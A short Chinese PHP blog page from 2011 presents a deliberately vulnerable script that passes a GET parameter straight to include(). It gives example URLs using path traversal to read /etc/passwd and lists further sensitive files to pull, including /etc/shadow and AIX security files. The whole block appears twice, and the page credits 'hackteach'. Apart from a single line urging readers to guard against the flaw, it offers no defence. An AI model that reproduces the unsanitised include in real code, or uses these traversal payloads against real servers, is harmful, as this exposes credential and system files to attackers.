php 伪造本地文件包含漏洞的代码
更新时间:2011年11月03日 23:33:36 作者:
php 伪造本地文件包含漏洞的代码,大家一定要注意防范。
代码:
<?php
$page=$_GET['page'];
include($page.'php');
?>
你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
来自hackteach
复制代码 代码如下:
<?php
$page=$_GET['page'];
include($page.'php');
?>
你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
来自hackteach
相关文章
php正则提取html图片(img)src地址与任意属性的方法
下面小编就为大家带来一篇php正则提取html图片(img)src地址与任意属性的方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧2017-02-02
在开发PHP应用中如果不想自己开发新的加密算法,还可以利用PHP提供的crypt()函数来完成单向加密功能2012-09-09
PHP在多进程模式下(并发的web访问)由于没有内置的锁支持,在处理一些资源的之后,很容易出现并发性问题。2009-11-11
PHP函数checkdnsrr用法详解(Windows平台用法)
这篇文章主要介绍了PHP函数checkdnsrr用法,分析讲解了在Windows平台使用checkdnsrr函数的方法,需要的朋友可以参考下2016-03-03
在本篇文章里小编给大家分享的是一篇关于PHP依赖注入容器知识点内容,有兴趣的朋友们可以学习下。2020-01-01
在本篇文章里小编给大家整理的是关于PHP与SQL语句写一句话木马的相关知识点,有需要的朋友们学习下。2019-10-10
这篇文章主要介绍了PHP生成各种随机验证码的方法,结合具体实例形式总结分析了php常用的生成验证码操作相关技巧,并附带demo源码供读者下载参考,需要的朋友可以参考下2017-06-06
用PHP读取flv文件的播放时间长度的代码,需要用的朋友可以参考下。2009-09-09
这篇文章主要介绍了php中mail函数发送邮件失败的解决方法,涉及针对Linux运行平台相关组件的配置技巧,具有一定的参考借鉴价值,需要的朋友可以参考下2014-12-12
这篇文章主要介绍了PHP通过GD库实现验证码功能,结合实例形式分析了php验证码相关图片绘制、输出操作实现技巧,需要的朋友可以参考下2019-02-02
最新评论